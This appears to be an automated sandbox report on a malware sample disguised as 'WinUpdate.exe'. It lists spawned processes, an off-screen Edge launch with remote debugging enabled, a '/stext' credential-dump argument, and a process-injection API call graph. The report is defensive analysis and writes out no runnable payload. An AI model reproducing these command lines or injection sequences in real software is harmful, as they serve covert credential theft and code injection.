                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                                                                              Start time:01:22:08
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe /stext "C:\Users\user\AppData\Local\Temp\mgfharkyxdkunkmiffxvayibdtasarj"
                                                                                                                                                                                                                                                                                              Imagebase:0xf90000
                                                                                                                                                                                                                                                                                              File size:982'016 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:B074E2458B987EFEC69536A58316D5A6
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                                                                              Start time:01:22:13
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1972,i,12355548801112023656,6493178295875206895,262144 /prefetch:8
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                                                                              Start time:01:22:14
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0x770000
                                                                                                                                                                                                                                                                                              File size:982'016 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:B074E2458B987EFEC69536A58316D5A6
                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                                                                                              Start time:01:22:15
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0x70000
                                                                                                                                                                                                                                                                                              File size:982'016 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:B074E2458B987EFEC69536A58316D5A6
                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                                                                              Start time:01:22:15
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0x5d0000
                                                                                                                                                                                                                                                                                              File size:982'016 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:B074E2458B987EFEC69536A58316D5A6
                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                                                                                              Start time:01:22:22
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:--user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                                                                                              Start time:01:22:22
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0x8e0000
                                                                                                                                                                                                                                                                                              File size:982'016 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:B074E2458B987EFEC69536A58316D5A6
                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                                                                                              Start time:01:22:22
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                                                                                              Start time:01:22:24
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2984 --field-trial-handle=2680,i,13951100852068889132,5640976159608311399,262144 /prefetch:3
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                                                                                                              Start time:01:22:25
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1976,i,6555542127114482677,3967349702858175070,262144 /prefetch:3
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                                                                                              Start time:01:22:27
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0x60000
                                                                                                                                                                                                                                                                                              File size:982'016 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:B074E2458B987EFEC69536A58316D5A6
                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                                                                                              Start time:01:22:27
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0x5d0000
                                                                                                                                                                                                                                                                                              File size:982'016 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:B074E2458B987EFEC69536A58316D5A6
                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                                                                                              Start time:01:22:29
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5380 --field-trial-handle=2680,i,13951100852068889132,5640976159608311399,262144 /prefetch:8
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                                                                                              Start time:01:22:29
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6664 --field-trial-handle=2680,i,13951100852068889132,5640976159608311399,262144 /prefetch:8
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                                                                                              Start time:01:22:29
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2680,i,13951100852068889132,5640976159608311399,262144 /prefetch:8
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                                              File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                                                                                                              Start time:01:22:29
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2680,i,13951100852068889132,5640976159608311399,262144 /prefetch:8
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                                              File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                Execution Coverage:9.8%
                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                                                                Total number of Nodes:141
                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:13
                                                                                                                                                                                                                                                                                                execution_graph 26654 161d660 DuplicateHandle 26655 161d6f6 26654->26655 26685 161ac90 26686 161ac9f 26685->26686 26689 161ad88 26685->26689 26694 161ad79 26685->26694 26690 161adbc 26689->26690 26691 161ad99 26689->26691 26690->26686 26691->26690 26692 161afc0 GetModuleHandleW 26691->26692 26693 161afed 26692->26693 26693->26686 26695 161adbc 26694->26695 26697 161ad99 26694->26697 26695->26686 26696 161afc0 GetModuleHandleW 26698 161afed 26696->26698 26697->26695 26697->26696 26698->26686 26656 743e360 26657 743e4eb 26656->26657 26659 743e386 26656->26659 26659->26657 26660 7438844 26659->26660 26661 743e5e0 PostMessageW 26660->26661 26663 743e64c 26661->26663 26663->26659 26664 1614668 26665 161467a 26664->26665 26666 1614686 26665->26666 26668 1614778 26665->26668 26669 161479d 26668->26669 26673 1614888 26669->26673 26677 1614879 26669->26677 26674 16148af 26673->26674 26675 161498c 26674->26675 26681 16144b4 26674->26681 26679 1614888 26677->26679 26678 161498c 26678->26678 26679->26678 26680 16144b4 CreateActCtxA 26679->26680 26680->26678 26682 1615918 CreateActCtxA 26681->26682 26684 16159db 26682->26684 26699 161d418 26700 161d45e GetCurrentProcess 26699->26700 26702 161d4b0 GetCurrentThread 26700->26702 26703 161d4a9 26700->26703 26704 161d4e6 26702->26704 26705 161d4ed GetCurrentProcess 26702->26705 26703->26702 26704->26705 26708 161d523 26705->26708 26706 161d54b GetCurrentThreadId 26707 161d57c 26706->26707 26708->26706 26709 743c4bf 26711 743c1fb 26709->26711 26710 743c448 26711->26710 26714 743d108 26711->26714 26728 743d0f8 26711->26728 26715 743d122 26714->26715 26723 743d146 26715->26723 26742 743d66e 26715->26742 26747 743d829 26715->26747 26752 743dacb 26715->26752 26757 743d526 26715->26757 26761 743d907 26715->26761 26766 743d5df 26715->26766 26771 743dbd9 26715->26771 26776 743db7b 26715->26776 26781 743de34 26715->26781 26785 743d973 26715->26785 26790 743d7b3 26715->26790 26723->26710 26729 743d10b 26728->26729 26730 743d907 2 API calls 26729->26730 26731 743d526 2 API calls 26729->26731 26732 743dacb 2 API calls 26729->26732 26733 743d829 2 API calls 26729->26733 26734 743d66e 2 API calls 26729->26734 26735 743d7b3 2 API calls 26729->26735 26736 743d973 2 API calls 26729->26736 26737 743d146 26729->26737 26738 743de34 2 API calls 26729->26738 26739 743db7b 2 API calls 26729->26739 26740 743dbd9 2 API calls 26729->26740 26741 743d5df 2 API calls 26729->26741 26730->26737 26731->26737 26732->26737 26733->26737 26734->26737 26735->26737 26736->26737 26737->26710 26738->26737 26739->26737 26740->26737 26741->26737 26743 743d675 26742->26743 26795 743bc50 26743->26795 26799 743bc48 26743->26799 26744 743d6a3 26744->26723 26748 743d8ac 26747->26748 26803 743b9c1 26748->26803 26807 743b9c8 26748->26807 26749 743d8c7 26749->26723 26753 743daec 26752->26753 26754 743dbe6 26753->26754 26811 743b910 26753->26811 26815 743b918 26753->26815 26819 743bde8 26757->26819 26823 743bddd 26757->26823 26762 743d910 26761->26762 26827 743bb60 26762->26827 26831 743bb59 26762->26831 26763 743d587 26763->26723 26767 743d5e5 26766->26767 26769 743bb60 WriteProcessMemory 26767->26769 26770 743bb59 WriteProcessMemory 26767->26770 26768 743d61e 26768->26723 26769->26768 26770->26768 26772 743dbe6 26771->26772 26773 743daec 26771->26773 26773->26771 26774 743b910 ResumeThread 26773->26774 26775 743b918 ResumeThread 26773->26775 26774->26773 26775->26773 26779 743b9c1 Wow64SetThreadContext 26776->26779 26780 743b9c8 Wow64SetThreadContext 26776->26780 26777 743d775 26777->26776 26778 743dddd 26777->26778 26779->26777 26780->26777 26835 743ba99 26781->26835 26839 743baa0 26781->26839 26782 743de55 26786 743d5fd 26785->26786 26787 743d61e 26786->26787 26788 743bb60 WriteProcessMemory 26786->26788 26789 743bb59 WriteProcessMemory 26786->26789 26787->26723 26788->26787 26789->26787 26793 743bb60 WriteProcessMemory 26790->26793 26794 743bb59 WriteProcessMemory 26790->26794 26791 743d71d 26791->26790 26792 743d587 26791->26792 26792->26723 26793->26791 26794->26791 26796 743bc96 ReadProcessMemory 26795->26796 26798 743bcdf 26796->26798 26798->26744 26800 743bc4f ReadProcessMemory 26799->26800 26802 743bcdf 26800->26802 26802->26744 26804 743b9c8 Wow64SetThreadContext 26803->26804 26806 743ba55 26804->26806 26806->26749 26808 743ba0d Wow64SetThreadContext 26807->26808 26810 743ba55 26808->26810 26810->26749 26812 743b918 ResumeThread 26811->26812 26814 743b989 26812->26814 26814->26753 26816 743b958 ResumeThread 26815->26816 26818 743b989 26816->26818 26818->26753 26820 743be71 26819->26820 26820->26820 26821 743bfd6 CreateProcessA 26820->26821 26822 743c033 26821->26822 26822->26822 26824 743bde8 CreateProcessA 26823->26824 26826 743c033 26824->26826 26826->26826 26828 743bba6 WriteProcessMemory 26827->26828 26830 743bbff 26828->26830 26830->26763 26832 743bb5f WriteProcessMemory 26831->26832 26834 743bbff 26832->26834 26834->26763 26836 743baa0 VirtualAllocEx 26835->26836 26838 743bb1d 26836->26838 26838->26782 26840 743bae0 VirtualAllocEx 26839->26840 26842 743bb1d 26840->26842 26842->26782
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: b4f7a8569f57a2cc27ee2550fa53c187c6f8b9087111e1c0575101b32fbf2be3
                                                                                                                                                                                                                                                                                                • Instruction ID: 0f8f2f62a8b2af100539b5378381d13a3e1585a1dc87773e7fa2141ea5510716
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4f7a8569f57a2cc27ee2550fa53c187c6f8b9087111e1c0575101b32fbf2be3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8712ACB0B012059FDB19DBB5D950BAEB7F6AF89300F24446EE10A9B3A5CB31ED05CB51

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0161D496
                                                                                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 0161D4D3
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0161D510
                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0161D569
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2134282321.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1610000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 4c0d30960a35504a0b4902342deafa40e261a5f8a923974ca35645f09af9e58c
                                                                                                                                                                                                                                                                                                • Instruction ID: 8cc645b2a77a011edb3a47edfa399e5be3e0a5d17f08e58e988073fa9c8beb94
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c0d30960a35504a0b4902342deafa40e261a5f8a923974ca35645f09af9e58c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E5145B0901349CFEB18DFAAD948BDEBBF1AF88314F248459D009A73A0DB746944CB65

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0161D496
                                                                                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 0161D4D3
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0161D510
                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0161D569
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2134282321.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1610000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 299df6b1cd9c70f9e1cab6812067b69e955846fd4c0589c174d9ced3a5de327b
                                                                                                                                                                                                                                                                                                • Instruction ID: 4435deaf28d570ff79f573e8db61000c450ca3041d853e225151fe6d90f9f154
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 299df6b1cd9c70f9e1cab6812067b69e955846fd4c0589c174d9ced3a5de327b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 365156B09013098FEB08DFAAD948BDEBBF1FF88314F248459D009A7360DB746944CB65

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 44 743bddd-743be7d 47 743beb6-743bed6 44->47 48 743be7f-743be89 44->48 53 743bed8-743bee2 47->53 54 743bf0f-743bf3e 47->54 48->47 49 743be8b-743be8d 48->49 51 743beb0-743beb3 49->51 52 743be8f-743be99 49->52 51->47 55 743be9b 52->55 56 743be9d-743beac 52->56 53->54 58 743bee4-743bee6 53->58 64 743bf40-743bf4a 54->64 65 743bf77-743c031 CreateProcessA 54->65 55->56 56->56 57 743beae 56->57 57->51 59 743bf09-743bf0c 58->59 60 743bee8-743bef2 58->60 59->54 62 743bef6-743bf05 60->62 63 743bef4 60->63 62->62 67 743bf07 62->67 63->62 64->65 66 743bf4c-743bf4e 64->66 76 743c033-743c039 65->76 77 743c03a-743c0c0 65->77 68 743bf71-743bf74 66->68 69 743bf50-743bf5a 66->69 67->59 68->65 71 743bf5e-743bf6d 69->71 72 743bf5c 69->72 71->71 73 743bf6f 71->73 72->71 73->68 76->77 87 743c0c2-743c0c6 77->87 88 743c0d0-743c0d4 77->88 87->88 89 743c0c8 87->89 90 743c0d6-743c0da 88->90 91 743c0e4-743c0e8 88->91 89->88 90->91 94 743c0dc 90->94 92 743c0ea-743c0ee 91->92 93 743c0f8-743c0fc 91->93 92->93 95 743c0f0 92->95 96 743c10e-743c115 93->96 97 743c0fe-743c104 93->97 94->91 95->93 98 743c117-743c126 96->98 99 743c12c 96->99 97->96 98->99 101 743c12d 99->101 101->101
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0743C01E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                                                                                                                                                                • Opcode ID: a570557294ea0c97d899e90fdbd1c144c859cf9668113157cd838412fb16e82b
                                                                                                                                                                                                                                                                                                • Instruction ID: 9c4323aaad2f56f5a23cb81201d660355e026dbc8a7f544cfae80c9098a1c0ed
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a570557294ea0c97d899e90fdbd1c144c859cf9668113157cd838412fb16e82b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3A15DB1D00659DFEB14CFA8C9817DEBBB2FF48314F14856AE808A7280DB759985CF91

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
